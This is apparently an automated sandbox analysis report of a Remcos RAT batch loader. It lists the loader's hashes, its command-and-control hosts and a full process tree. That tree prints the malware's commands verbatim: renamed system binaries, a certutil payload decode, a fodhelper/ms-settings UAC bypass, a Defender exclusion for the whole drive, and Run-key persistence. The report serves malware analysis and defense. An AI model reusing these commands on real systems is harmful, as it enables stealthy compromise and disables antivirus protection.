Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 15:09
Static task
static1
Behavioral task
behavioral1
Sample
yak.cmd
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
yak.cmd
Resource
win10v2004-20240508-en
General
-
Target
yak.cmd
-
Size
3.2MB
-
MD5
f09fcd4720339bb3092fe8b0e0c9f631
-
SHA1
56afd26c5a724a87ce8d3648213a6ff2adcc10a9
-
SHA256
ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022
-
SHA512
6304df118b808c2334248c14184cfad98a0ccb3931cb7876c718f328af5093c65c8b71e10ae73fc8b8dd8868ffe73c4e6ca1e2f327cb85cf5c385accc6aadcdd
-
SSDEEP
24576:rSyi8cqIjNCrvFt5YjM8JfKlt/6azwC2ig407jFudT1omd4pig5j+RCNJXCP+pp:rSyTn2g51/6Zigt74omdu3p
Malware Config
Extracted
remcos
RemoteHost
myumysmeetr.ddns.net:2404
mysweeterbk.ddns.net:2404
meetre1ms.freeddns.org:2404
bbhmeetre1ms.freeddns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TPT9X3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2756 alpha.exe 2368 alpha.exe 2524 alpha.exe 2684 alpha.exe 2712 kn.exe 2720 alpha.exe 2540 alpha.exe 2616 alpha.exe 2584 alpha.exe 2176 xkn.exe 2908 alpha.exe 2132 ger.exe 332 alpha.exe 1992 kn.exe 2404 alpha.exe 2140 alpha.exe 1592 Ping_c.pif 1996 alpha.exe 2152 alpha.exe 356 alpha.exe 320 alpha.exe 108 alpha.exe 1504 alpha.exe 2792 alpha.exe -
Loads dropped DLL 18 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exepid process 2500 cmd.exe 2500 cmd.exe 2500 cmd.exe 2500 cmd.exe 2684 alpha.exe 2500 cmd.exe 2500 cmd.exe 2500 cmd.exe 2500 cmd.exe 2584 alpha.exe 2176 xkn.exe 2176 xkn.exe 2176 xkn.exe 2908 alpha.exe 2500 cmd.exe 332 alpha.exe 2500 cmd.exe 2500 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Ping_c.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Duchpovs = "C:\\Users\\Public\\Duchpovs.url" Ping_c.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2656 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open ger.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 1592 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exePing_c.pifpid process 2176 xkn.exe 1592 Ping_c.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2176 xkn.exe Token: SeDebugPrivilege 2656 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 2068 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 2068 SndVol.exe 2068 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2500 wrote to memory of 616 2500 cmd.exe extrac32.exe PID 2500 wrote to memory of 616 2500 cmd.exe extrac32.exe PID 2500 wrote to memory of 616 2500 cmd.exe extrac32.exe PID 2500 wrote to memory of 2756 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2756 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2756 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2368 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2368 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2368 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2524 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2524 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2524 2500 cmd.exe alpha.exe PID 2524 wrote to memory of 2224 2524 alpha.exe extrac32.exe PID 2524 wrote to memory of 2224 2524 alpha.exe extrac32.exe PID 2524 wrote to memory of 2224 2524 alpha.exe extrac32.exe PID 2500 wrote to memory of 2684 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2684 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2684 2500 cmd.exe alpha.exe PID 2684 wrote to memory of 2712 2684 alpha.exe kn.exe PID 2684 wrote to memory of 2712 2684 alpha.exe kn.exe PID 2684 wrote to memory of 2712 2684 alpha.exe kn.exe PID 2500 wrote to memory of 2720 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2720 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2720 2500 cmd.exe alpha.exe PID 2720 wrote to memory of 3004 2720 alpha.exe extrac32.exe PID 2720 wrote to memory of 3004 2720 alpha.exe extrac32.exe PID 2720 wrote to memory of 3004 2720 alpha.exe extrac32.exe PID 2500 wrote to memory of 2540 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2540 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2540 2500 cmd.exe alpha.exe PID 2540 wrote to memory of 2452 2540 alpha.exe extrac32.exe PID 2540 wrote to memory of 2452 2540 alpha.exe extrac32.exe PID 2540 wrote to memory of 2452 2540 alpha.exe extrac32.exe PID 2500 wrote to memory of 2616 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2616 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2616 2500 cmd.exe alpha.exe PID 2616 wrote to memory of 2704 2616 alpha.exe extrac32.exe PID 2616 wrote to memory of 2704 2616 alpha.exe extrac32.exe PID 2616 wrote to memory of 2704 2616 alpha.exe extrac32.exe PID 2500 wrote to memory of 2584 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2584 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2584 2500 cmd.exe alpha.exe PID 2584 wrote to memory of 2176 2584 alpha.exe xkn.exe PID 2584 wrote to memory of 2176 2584 alpha.exe xkn.exe PID 2584 wrote to memory of 2176 2584 alpha.exe xkn.exe PID 2176 wrote to memory of 2908 2176 xkn.exe alpha.exe PID 2176 wrote to memory of 2908 2176 xkn.exe alpha.exe PID 2176 wrote to memory of 2908 2176 xkn.exe alpha.exe PID 2908 wrote to memory of 2132 2908 alpha.exe ger.exe PID 2908 wrote to memory of 2132 2908 alpha.exe ger.exe PID 2908 wrote to memory of 2132 2908 alpha.exe ger.exe PID 2500 wrote to memory of 332 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 332 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 332 2500 cmd.exe alpha.exe PID 332 wrote to memory of 1992 332 alpha.exe kn.exe PID 332 wrote to memory of 1992 332 alpha.exe kn.exe PID 332 wrote to memory of 1992 332 alpha.exe kn.exe PID 2500 wrote to memory of 2404 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2404 2500 cmd.exe alpha.exe PID 2500 wrote to memory of 2404 2500 cmd.exe alpha.exe PID 2404 wrote to memory of 2656 2404 alpha.exe taskkill.exe PID 2404 wrote to memory of 2656 2404 alpha.exe taskkill.exe PID 2404 wrote to memory of 2656 2404 alpha.exe taskkill.exe PID 2500 wrote to memory of 1592 2500 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\yak.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:616
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:2756
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2368
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2224
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:2712
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:3004
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2452
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:2704
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:2132
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:1992
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1592 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF3⤵PID:2512
-
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2068
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:2140
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:1996
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:2152
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:356
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:320
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:108
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1504
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2792
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD5c815760333cd37a90a51fda4b8105c04
SHA17f1131d2628493e00d5918aac2890c6cd84060b0
SHA256a3012567131467698347321f3d74a4e9cc8a2a0357effb891e058b5cb9611243
SHA512d1c9a3a551494171c60ada66075fd95baf4def572061696dddd6037a40a2e7cfa547687e7f86c03a8871fb66d4e05c1a36e9e410f93026b089d04ea5a25bd710
-
Filesize
1.1MB
MD533bbd27a00b4160a844a7edf2efef84e
SHA1c3f19d22898b690d4c98c59416c62ec6e54a39de
SHA2562c49f89d2a461bb32f9c50f8b37fb53b0f86294d4f03fb3e08588e979329fb45
SHA512d4628cdae15273dc0863afa06153d202d8a61ed8d0f9e213c47f029016b81cad7d2d4dc3c115aefbff9c9d0ba6d74e3aa89f09d5fd6226eaa597f0e0328415b7
-
Filesize
2.2MB
MD54ea05e6097590a5d2eac1ba0ada0a2fa
SHA163bb037ad57358d6931cccbc8a37c6bdeddcb497
SHA2568457b155358dd52b872245248bb8e3dfaa275cae2537e35520514b0a81833320
SHA5129103b62fbbba7e3b6304d50f6409bae14be2e4791d2d22b5b0d8181a269c686a56d8c269b48e194d414883e433965d91f22caa5035f0a539bfb441fa301d1a84
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d